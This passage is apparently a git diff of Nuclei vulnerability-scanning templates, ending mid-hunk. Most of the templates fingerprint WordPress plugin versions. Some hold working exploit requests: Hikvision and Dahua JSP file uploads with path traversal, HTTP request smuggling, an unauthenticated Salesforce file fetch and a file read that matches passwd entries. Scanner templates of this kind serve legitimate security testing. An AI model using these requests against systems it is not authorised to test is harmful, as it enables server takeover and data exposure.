https://www.wordfence.com/threat-intel/vulnerabilities/id/f5a54d1d-3593-4ba1-a747-651278488be6?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-8051 + metadata: + fofa-query: "wp-content/plugins/special-feed-items/" + google-query: inurl:"/wp-content/plugins/special-feed-items/" + shodan-query: 'vuln:CVE-2024-8051' + tags: cve,wordpress,wp-plugin,special-feed-items,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/special-feed-items/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "special-feed-items" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8052-e7604b09bc8937658ab6d84d35011faf.yaml b/poc/cve/CVE-2024-8052-e7604b09bc8937658ab6d84d35011faf.yaml new file mode 100644 index 0000000000..1aa0c50461 --- /dev/null +++ b/poc/cve/CVE-2024-8052-e7604b09bc8937658ab6d84d35011faf.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8052-e7604b09bc8937658ab6d84d35011faf + +info: + name: > + Review Ratings <= 1.6 - Cross-Site Request Forgery to Stored Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Review Ratings plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.6. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update plugin settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8f890790-c5ca-4812-9566-6c945d8f39b5?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-8052 + metadata: + fofa-query: "wp-content/plugins/ratings-shorttags/" + google-query: inurl:"/wp-content/plugins/ratings-shorttags/" + shodan-query: 'vuln:CVE-2024-8052' + tags: cve,wordpress,wp-plugin,ratings-shorttags,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ratings-shorttags/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ratings-shorttags" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.6') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8091-2a76422fe65a9439ffb66d6cccbb9f37.yaml b/poc/cve/CVE-2024-8091-2a76422fe65a9439ffb66d6cccbb9f37.yaml new file mode 100644 index 0000000000..abe36d939a --- /dev/null +++ b/poc/cve/CVE-2024-8091-2a76422fe65a9439ffb66d6cccbb9f37.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8091-2a76422fe65a9439ffb66d6cccbb9f37 + +info: + name: > + Enhanced Search Box <= 0.6.1 - Cross-Site Request Forgery to Settings Update + author: topscoder + severity: medium + description: > + The Enhanced Search Box plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.6.1. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/13fb8d16-2904-4c04-9ea6-5bafdf30f563?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-8091 + metadata: + fofa-query: "wp-content/plugins/extended-search-plugin/" + google-query: inurl:"/wp-content/plugins/extended-search-plugin/" + shodan-query: 'vuln:CVE-2024-8091' + tags: cve,wordpress,wp-plugin,extended-search-plugin,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/extended-search-plugin/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "extended-search-plugin" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 0.6.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8195.yaml b/poc/cve/CVE-2024-8195.yaml new file mode 100644 index 0000000000..e4ea22e6e1 --- /dev/null +++ b/poc/cve/CVE-2024-8195.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8195 + +info: + name: > + Permalink Manager Lite <= 2.4.4 - Missing Authorization to Unauthenticated Sensitive Information Exposure + author: topscoder + severity: high + description: > + The Permalink Manager Lite plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'debug_data', 'debug_query', and 'debug_redirect' functions in all versions up to, and including, 2.4.4. This makes it possible for unauthenticated attackers to extract sensitive data including password, title, and content of password-protected posts. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/aadf1d59-60ba-4da2-adbb-4e84d587a34d?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2024-8195 + metadata: + fofa-query: "wp-content/plugins/permalink-manager/" + google-query: inurl:"/wp-content/plugins/permalink-manager/" + shodan-query: 'vuln:CVE-2024-8195' + tags: cve,wordpress,wp-plugin,permalink-manager,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/permalink-manager/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "permalink-manager" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.4.4') \ No newline at end of file diff --git a/poc/cve/cve-2016-6210.yaml b/poc/cve/cve-2016-6210.yaml index 0cf11fcf80..668fd715ec 100644 --- a/poc/cve/cve-2016-6210.yaml +++ b/poc/cve/cve-2016-6210.yaml @@ -1,9 +1,10 @@ id: CVE-2016-6210 + info: name: OpenSSH username enumeration < v7.3 author: iamthefrogy,forgedhallpass severity: medium - tags: cve,cve2016,network,openssh + description: OpenSSH before 7.3 is vulnerable to username enumeration and DoS vulnerabilities. reference: - http://seclists.org/fulldisclosure/2016/Jul/51 @@ -15,15 +16,18 @@ info: cvss-score: 5.9 cve-id: CVE-2016-6210 cwe-id: CWE-200 + network: - host: - "{{Hostname}}" - "{{Host}}:22" + matchers: - type: regex regex: - '(?i)SSH-2.0-OpenSSH_(?:[1-6][^\d][^\r\n]+|7\.[0-2][^\d][\n^\r]+)' + extractors: - type: regex regex: - - '(?i)SSH-2.0-OpenSSH_[^\r\n]+' + - '(?i)SSH-2.0-OpenSSH_[^\r\n]+' \ No newline at end of file diff --git a/poc/cve/cve-2017-14524.yaml b/poc/cve/cve-2017-14524.yaml index e87149510b..20a95213bc 100644 --- a/poc/cve/cve-2017-14524.yaml +++ b/poc/cve/cve-2017-14524.yaml @@ -1,25 +1,43 @@ id: CVE-2017-14524 + info: - name: OpenText Documentum Administrator 7.2.0180.0055 - Open redirect + name: OpenText Documentum Administrator 7.2.0180.0055 - Open Redirect author: 0x_Akoko - severity: low - description: Multiple open redirect vulnerabilities in OpenText Documentum Administrator 7.2.0180.0055 allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks. + severity: medium + description: | + OpenText Documentum Administrator 7.2.0180.0055 is susceptible to multiple open redirect vulnerabilities. An attacker can redirect a user to a malicious site and potentially obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the download of malware. + remediation: | + Apply the latest security patches or upgrade to a patched version of OpenText Documentum Administrator. reference: - https://seclists.org/fulldisclosure/2017/Sep/57 - - https://www.cvedetails.com/cve/CVE-2017-14524 - - https://vuldb.com/?id.107201 - tags: cve,cve2017,redirect,opentext + - https://knowledge.opentext.com/knowledge/llisapi.dll/Open/68982774 + - https://nvd.nist.gov/vuln/detail/CVE-2017-14524 + - http://seclists.org/fulldisclosure/2017/Sep/57 + - https://github.com/ARPSyndicate/cvemon classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 cve-id: CVE-2017-14524 cwe-id: CWE-601 -requests: + epss-score: 0.00258 + epss-percentile: 0.6357 + cpe: cpe:2.3:a:opentext:documentum_administrator:7.2.0180.0055:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: opentext + product: documentum_administrator + tags: cve2017,cve,redirect,opentext,seclists + +http: - method: GET path: - - '{{BaseURL}}/xda/help/en/default.htm?startat=//example.com' + - '{{BaseURL}}/xda/help/en/default.htm?startat=//oast.me' + matchers: - type: regex - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$' part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?oast\.me(?:\s*?)$' +# digest: 4b0a00483046022100b32892e1ac671729ba982d52eb2d13b0e91ddae6c90c6b945a64e664d066cdb9022100eb9538968f1f58b108976f27fc2fa9ed8990673db1a2e1e1611c8fa3cfb12b8a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2018-1271.yaml b/poc/cve/cve-2018-1271.yaml index ccf03eab13..548327e206 100644 --- a/poc/cve/cve-2018-1271.yaml +++ b/poc/cve/cve-2018-1271.yaml @@ -1,18 +1,20 @@ id: CVE-2018-1271 - info: name: Spring MVC Directory Traversal Vulnerability author: hetroublemakr severity: medium - reference: https://medium.com/@knownsec404team/analysis-of-spring-mvc-directory-traversal-vulnerability-cve-2018-1271-b291bdb6be0d - + description: Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, allow applications to configure Spring MVC to serve static resources (e.g. CSS, JS, images). When static resources are served from a file system on Windows (as opposed to the classpath, or the ServletContext), a malicious user can send a request using a specially crafted URL that can lead a directory traversal attack. + reference: + - https://medium.com/@knownsec404team/analysis-of-spring-mvc-directory-traversal-vulnerability-cve-2018-1271-b291bdb6be0d + - https://pivotal.io/security/cve-2018-1271 + - http://web.archive.org/web/20210518132800/https://www.securityfocus.com/bid/103699 + - https://access.redhat.com/errata/RHSA-2018:1320 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 5.90 + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 5.9 cve-id: CVE-2018-1271 cwe-id: CWE-22 - description: "Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, allow applications to configure Spring MVC to serve static resources (e.g. CSS, JS, images). When static resources are served from a file system on Windows (as opposed to the classpath, or the ServletContext), a malicious user can send a request using a specially crafted URL that can lead a directory traversal attack." - + tags: cve,cve2018,spring,lfi,traversal requests: - method: GET path: diff --git a/poc/cve/cve-2018-15473.yaml b/poc/cve/cve-2018-15473.yaml index 2392e8714b..e2eabe600d 100644 --- a/poc/cve/cve-2018-15473.yaml +++ b/poc/cve/cve-2018-15473.yaml @@ -1,28 +1,28 @@ id: CVE-2018-15473 + info: name: OpenSSH Username Enumeration <= v7.7 author: r3dg33k,daffainfo,forgedhallpass severity: medium description: OpenSSH through 7.7 is prone to a user enumeration vulnerability due to not delaying bailout for an invalid authenticating user until after the packet containing the request has been fully parsed, related to auth2-gss.c, auth2-hostbased.c, and auth2-pubkey.c. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2018-15473 - - https://github.com/openbsd/src/commit/779974d35b4859c07bc3cb8a12c74b43b0a7d1e0 - - https://bugs.debian.org/906236 - - http://www.openwall.com/lists/oss-security/2018/08/15/5 + reference: https://nvd.nist.gov/vuln/detail/CVE-2018-15473 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 + cvss-score: 5.30 cve-id: CVE-2018-15473 cwe-id: CWE-362 - tags: network,openssh,cve,cve2018 + + network: - host: - "{{Hostname}}" - "{{Host}}:22" + matchers: - type: regex regex: - '(?i)SSH-2.0-OpenSSH_(?:[1-6][^\d][^\r]+|7\.[0-7][^\d][^\r]+)' + extractors: - type: regex regex: diff --git a/poc/cve/cve-2018-18778.yaml b/poc/cve/cve-2018-18778.yaml index a26da58807..6c269ecee5 100644 --- a/poc/cve/cve-2018-18778.yaml +++ b/poc/cve/cve-2018-18778.yaml @@ -1,18 +1,18 @@ id: CVE-2018-18778 - info: name: mini_httpd Path Traversal author: dhiyaneshDK severity: medium description: ACME mini_httpd before 1.30 lets remote users read arbitrary files. - reference: https://www.acunetix.com/vulnerabilities/web/acme-mini_httpd-arbitrary-file-read/ - + reference: + - https://www.acunetix.com/vulnerabilities/web/acme-mini_httpd-arbitrary-file-read/ + - http://www.acme.com/software/mini_httpd/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N - cvss-score: 6.50 + cvss-score: 6.5 cve-id: CVE-2018-18778 cwe-id: CWE-200 - + tags: cve,cve2018,lfi,mini_httpd requests: - raw: - |+ @@ -25,7 +25,6 @@ requests: - type: status status: - 200 - - type: regex regex: - "root:.*:0:0:" diff --git a/poc/detect/salesforce-contentdocument-detector.yaml b/poc/detect/salesforce-contentdocument-detector.yaml new file mode 100644 index 0000000000..19c7c66a85 --- /dev/null +++ b/poc/detect/salesforce-contentdocument-detector.yaml @@ -0,0 +1,37 @@ +id: salesforce-contentdocument-detector + +info: + name: Salesforce ContentDocument Detector + author: TedJackson + severity: Medium + description: A Salesforce Lightning aura API allows unathenticated users to fetch files. + tags: aura,unauth,salesforce,exposure,misconfig + +requests: + - method: GET + path: + - "{{BaseURL}}/s/" + + extractors: + - type: regex + group: 1 + name: auracontext + part: body + internal: true + regex: + - "\\/s\\/sfsites\\/l\\/([a-zA-Z0-9\\-_~.%]+)\\/[^\\/]+\\.js" + + - raw: + - | + POST /s/sfsites/aura HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36 + Content-Type: application/x-www-form-urlencoded + + message={"actions":[{"id":"123;a","descriptor":"serviceComponent://ui.force.components.controllers.lists.selectableListDataProvider.SelectableListDataProviderController/ACTION$getItems","callingDescriptor":"UNKNOWN","params":{"entityNameOrId":"ContentDocument","layoutType":"FULL","pageSize":100,"currentPage":0,"useTimeout":false,"getCount":false,"enableRowActions":false}}]}&aura.context={{auracontext}}&aura.pageURI=%2Fs%2F&aura.token=null + + matchers: + - type: word + words: + - '"state":"SUCCESS",' + part: body diff --git a/poc/exposed/exposed-springboot.yaml b/poc/exposed/exposed-springboot.yaml index 5e1e407c32..51a66859dc 100644 --- a/poc/exposed/exposed-springboot.yaml +++ b/poc/exposed/exposed-springboot.yaml @@ -1,12 +1,10 @@ id: springboot-heapdump info: - name: Spring Boot Actuator - Heap Dump Detection + name: Detect Springboot Heapdump Actuator author: that_juan_,dwisiswant0,wdahlenb severity: critical - description: A Spring Boot Actuator heap dump was detected. A heap dump is a snapshot of JVM memory, which could expose environment variables and HTTP requests. - reference: - - https://github.com/pyn3rd/Spring-Boot-Vulnerability + description: Environment variables and HTTP requests can be found in the HPROF tags: springboot,exposure requests: @@ -30,5 +28,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/05/20 diff --git a/poc/http/cl-te-http-smuggling.yaml b/poc/http/cl-te-http-smuggling.yaml index ddb83e064d..278b84146d 100644 --- a/poc/http/cl-te-http-smuggling.yaml +++ b/poc/http/cl-te-http-smuggling.yaml @@ -1,37 +1,35 @@ -id: CL-TE-http-smuggling - -info: - name: HTTP request smuggling, basic CL.TE vulnerability - author: pdteam, akincibor - severity: Low - -http: - - raw: - - |+ - POST / HTTP/1.1 - Host: {{Hostname}} - Connection: keep-alive - Content-Type: application/x-www-form-urlencoded - Content-Length: 6 - Transfer-Encoding: chunked - - 0 - - G - - |+ - POST / HTTP/1.1 - Host: {{Hostname}} - Connection: keep-alive - Content-Type: application/x-www-form-urlencoded - Content-Length: 6 - Transfer-Encoding: chunked - - 0 - - G - - unsafe: true - matchers: - - type: dsl - dsl: - - 'contains(body, "Unrecognized method GPOST")' \ No newline at end of file +id: CL-TE-http-smuggling +info: + name: HTTP request smuggling, basic CL.TE vulnerability + author: pdteam, akincibor + severity: Low +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Connection: keep-alive + Content-Type: application/x-www-form-urlencoded + Content-Length: 6 + Transfer-Encoding: chunked + + 0 + + G + - |+ + POST / HTTP/1.1 + Host: {{Hostname}} + Connection: keep-alive + Content-Type: application/x-www-form-urlencoded + Content-Length: 6 + Transfer-Encoding: chunked + + 0 + + G + + unsafe: true + matchers: + - type: dsl + dsl: + - 'contains(body, "Unrecognized method GPOST")' diff --git a/poc/microsoft/Hikvision_iVMS-8700_Fileupload_report.yaml b/poc/microsoft/Hikvision_iVMS-8700_Fileupload_report.yaml index cd961f6e81..e86e8491d1 100644 --- a/poc/microsoft/Hikvision_iVMS-8700_Fileupload_report.yaml +++ b/poc/microsoft/Hikvision_iVMS-8700_Fileupload_report.yaml @@ -1,27 +1,40 @@ id: HiKVISION info: - name: HiKVISION Integrated Security Management Platform Env Information Leakage Vulnerability - author: zerZero Trust Security Attack and Defense Laboratoryo - severity: medium + name: HiKVISION Comprehensive Security Management Platform Report Arbitrary File Upload Vulnerability + author: Zero Trust Security Attack and Defense Laboratory + severity: high description: | - There is an information leakage vulnerability in the HIKVISION comprehensive security management platform, which allows attackers to obtain sensitive information such as environmental env for further attacks + There is an arbitrary file upload vulnerability in the HiKVISION comprehensive security management platform report interface. Attackers can upload arbitrary files and obtain server privileges by constructing special request packets metadata: - fofa-query: app="HIKVISION-综合安防管理平台" + fofa-query: app="HIKVISION-综合安防管理平台" || title=="综合安防管理平台" hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" http: - - method: GET - path: - - "{{BaseURL}}/artemis-portal/artemis/env" + - raw: + - | + POST /svm/api/external/report HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a - matchers-condition: and - matchers: - - type: word - part: body - words: - - "profiles" + ------WebKitFormBoundary9PggsiM755PLa54a + Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/test.jsp" + Content-Type: application/zip + + <%out.print("test");%> - - type: status - status: - - 200 + ------WebKitFormBoundary9PggsiM755PLa54a-- + - | + GET /portal/ui/login/..;/..;/test.jsp HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 + + req-condition: true + matchers: + - type: dsl + dsl: + - 'status_code_1 == 200' + - 'contains(body_1, "data")' + - 'status_code_2 == 200' + - 'contains(body_2, "test")' + condition: and diff --git a/poc/microsoft/Hikvision_iVMS-8700_upload_action.yaml b/poc/microsoft/Hikvision_iVMS-8700_upload_action.yaml index 7e328a8b1b..7f081b05e0 100644 --- a/poc/microsoft/Hikvision_iVMS-8700_upload_action.yaml +++ b/poc/microsoft/Hikvision_iVMS-8700_upload_action.yaml @@ -1,50 +1,48 @@ id: HIKVISION info: - name: HHIKVISION iVMS-8700 upload Webshell file - author: zerZero Trust Security Attack and Defense Laboratory + name: HIKVISION iVMS-8700 Comprehensive Security Management Platform 1 upload Webshell file + author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - HHIKVISION iVMS-8700 Comprehensive Security Management Platfor upload Webshell file + HIKVISION iVMS-8700 Comprehensive Security Management Platform 1 There is an arbitrary file upload vulnerability where attackers can control the server by sending specific request packets to upload Webshell files metadata: fofa-query: icon_hash="-911494769" hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" variables: - str0: '{{BaseURL}}/eps/api/resourceOperations/uploadsecretKeyIbuilding' + str1: '{{rand_base(6)}}' + str2: '{{rand_base(6)}}' + str3: '<%out.print("{{str2}}");%>' http: - raw: - | - POST /eps/api/resourceOperations/upload?token={{toupper(md5(str0))}} HTTP/1.1 + POST /eps/resourceOperations/upload.action HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Android 3.2.5; Mobile; rv:51.0) Gecko/51.0 Firefox/51.0 - Accept-Encoding: gzip, deflate - Accept: */* - Connection: close - Content-Length: 184 - Content-Type: multipart/form-data; boundary=c4155aff43901a8b2a19a4641a5efa15 - - --c4155aff43901a8b2a19a4641a5efa15 - Content-Disposition: form-data; name="fileUploader"; filename="test.jsp" + User-Agent: MicroMessenger + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTJyhtTNqdMNLZLhj + + ------WebKitFormBoundaryTJyhtTNqdMNLZLhj + Content-Disposition: form-data; name="fileUploader";filename="{{str1}}.jsp" Content-Type: image/jpeg - {{randstr}} - --c4155aff43901a8b2a19a4641a5efa15-- + {{str3}} + ------WebKitFormBoundaryTJyhtTNqdMNLZLhj-- - | - GET /eps/upload/{{name}}.jsp HTTP/1.1 + GET /eps/upload/{{res_id}}.jsp HTTP/1.1 Host: {{Hostname}} extractors: - type: json - name: name + name: res_id json: - ".data.resourceUuid" internal: true matchers: - - type: word - words: - - '{{randstr}}' + - type: dsl + dsl: + - body_2 == str2 diff --git a/poc/microsoft/arforms-881dfd77d6d86c39aaa256deaef65e79.yaml b/poc/microsoft/arforms-881dfd77d6d86c39aaa256deaef65e79.yaml new file mode 100644 index 0000000000..0f612783a8 --- /dev/null +++ b/poc/microsoft/arforms-881dfd77d6d86c39aaa256deaef65e79.yaml @@ -0,0 +1,59 @@ +id: arforms-881dfd77d6d86c39aaa256deaef65e79 + +info: + name: > + ARForms - Premium WordPress Form Builder <= 6.4.0 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/b23989c2-6cd7-4e55-b019-324644e7521a?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/arforms/" + google-query: inurl:"/wp-content/plugins/arforms/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,arforms,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/arforms/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "arforms" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.4.0') \ No newline at end of file diff --git a/poc/microsoft/dahua-wpms-addimgico-fileupload.yaml b/poc/microsoft/dahua-wpms-addimgico-fileupload.yaml index c7afb0444b..fa3aafbfe2 100644 --- a/poc/microsoft/dahua-wpms-addimgico-fileupload.yaml +++ b/poc/microsoft/dahua-wpms-addimgico-fileupload.yaml @@ -1,50 +1,68 @@ id: CVE-2023-3836 info: - name: 大华-WPMS-upload-addimgico - author: hufei - severity: high + name: Dahua Smart Park Management - Arbitrary File Upload + author: HuTa0 + severity: critical description: | - 大华 智慧园区综合管理平台 devicePoint_addImgIco 接口存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件到服务器中,控制服务器权限 + Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?. + remediation: | + Apply the latest security patch or update provided by the vendor to fix the arbitrary file upload vulnerability. reference: - https://github.com/PeiQi0/PeiQi-WIKI-Book/tree/main/docs/wiki/iot/%E5%A4%A7%E5%8D%8E + - https://github.com/qiuhuihk/cve/blob/main/upload.md + - https://nvd.nist.gov/vuln/detail/CVE-2023-3836 + - https://vuldb.com/?ctiid.235162 + - https://vuldb.com/?id.235162 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-3836 + cwe-id: CWE-434 + epss-score: 0.03083 + epss-percentile: 0.8997 + cpe: cpe:2.3:a:dahuasecurity:smart_parking_management:*:*:*:*:*:*:*:* metadata: - max-request: 1 - fofa-query: app="大华-智慧园区综合管理平台" - hunter-query: app.name="Dahua 大华 智慧园区管理平台" verified: true + max-request: 2 + vendor: dahuasecurity + product: smart_parking_management + shodan-query: html:"/WPMS/asset" + zoomeye-query: /WPMS/asset + tags: cve,cve2023,dahua,fileupload,intrusive,rce +variables: + random_str: "{{rand_base(6)}}" + match_str: "{{md5(random_str)}}" http: - raw: - | POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1 + Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT Host: {{Hostname}} - User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_4_8 like Mac OS X) AppleWebKit/533.0 (KHTML, like Gecko) FxiOS/11.8w0575.0 Mobile/69G115 Safari/533.0 - Accept-Encoding: gzip, deflate - Accept: */* - Connection: close - Content-Length: 177 - Content-Type: multipart/form-data; boundary=e00b34d08d13639f8b619829b04c1a29 - --e00b34d08d13639f8b619829b04c1a29 - Content-Disposition: form-data; name="upload"; filename="test.jsp" - Content-Type: image/gif - - {{randstr}} - --e00b34d08d13639f8b619829b04c1a29-- + --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT + Content-Disposition: form-data; name="upload"; filename="{{random_str}}.jsp" + Content-Type: application/octet-stream + Content-Transfer-Encoding: binary + {{match_str}} + --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT-- - | - GET /upload/emap/society_new/{{name}} HTTP/1.1 + GET /upload/emap/society_new/{{shell_filename}} HTTP/1.1 Host: {{Hostname}} + matchers: + - type: dsl + dsl: + - "status_code_1 == 200 && status_code_2 == 200" + - "contains(body_2, '{{match_str}}')" + condition: and + extractors: - - type: json - name: name - json: - - ".data" + - type: regex + name: shell_filename internal: true - - matchers: - - type: word - words: - - '{{randstr}}' \ No newline at end of file + part: body_1 + regex: + - 'ico_res_(\w+)_on\.jsp' +# digest: 4b0a00483046022100abbf084a12dda14741c23c4c2c7c8e7b6e231142a8333a69df8844ea1271532d022100a7a0d0f5b8caf3beb1708fed446cd4bf7efbe83fc8fa26aae836cb243dd64804:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/microsoft/funnelforms-free-d673e9b78beed9be045c9fddcda8387c.yaml b/poc/microsoft/funnelforms-free-d673e9b78beed9be045c9fddcda8387c.yaml new file mode 100644 index 0000000000..f16ba560ae --- /dev/null +++ b/poc/microsoft/funnelforms-free-d673e9b78beed9be045c9fddcda8387c.yaml @@ -0,0 +1,59 @@ +id: funnelforms-free-d673e9b78beed9be045c9fddcda8387c + +info: + name: > + Interactive Contact Form and Multi Step Form Builder with Drag & Drop Editor – Funnelforms Free <= 3.7.3.2 - Missing Authorization to Unauthenticated Arbitrary Media Deletion + author: topscoder + severity: high + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/5cd0e015-abf2-4905-8b42-46b685be2c74?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/funnelforms-free/" + google-query: inurl:"/wp-content/plugins/funnelforms-free/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,funnelforms-free,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/funnelforms-free/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "funnelforms-free" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.7.3.2') \ No newline at end of file diff --git a/poc/microsoft/special-feed-items-27adb5630206288cc4533169053590e1.yaml b/poc/microsoft/special-feed-items-27adb5630206288cc4533169053590e1.yaml new file mode 100644 index 0000000000..d1a67b3855 --- /dev/null +++ b/poc/microsoft/special-feed-items-27adb5630206288cc4533169053590e1.yaml @@ 